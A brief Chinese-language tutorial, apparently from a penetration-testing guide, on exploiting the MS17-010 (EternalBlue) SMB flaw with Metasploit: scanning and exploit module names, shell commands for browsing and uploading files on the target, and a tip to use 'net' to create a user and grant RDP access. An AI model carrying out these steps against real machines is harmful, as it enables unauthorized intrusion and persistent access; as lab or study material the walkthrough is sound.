使用 Metasploit Framework#
-
执行
msfconsole
命令,进入 msf 终端 -
搜索 ms17-010 相关模块
-
使用
auxiliary/scanner/smb/smb_ms17_010
模块进行扫描
-
使用
exploit/windows/smb/ms17_010_eternalblue
模块进行漏洞利用
-
漏洞利用成功的到 shell, 使用 help 命令可以查看支持的命令
常用命令:
lcd
切换本地目录
lls
浏览本地文件
cd
切换远端目录
ls
浏览远端文件
upload 本地文件 远端位置
上传文件
shell
调用远端 shell
cmd 里可以使用net
命令创建用户,添加 rdp 访问权限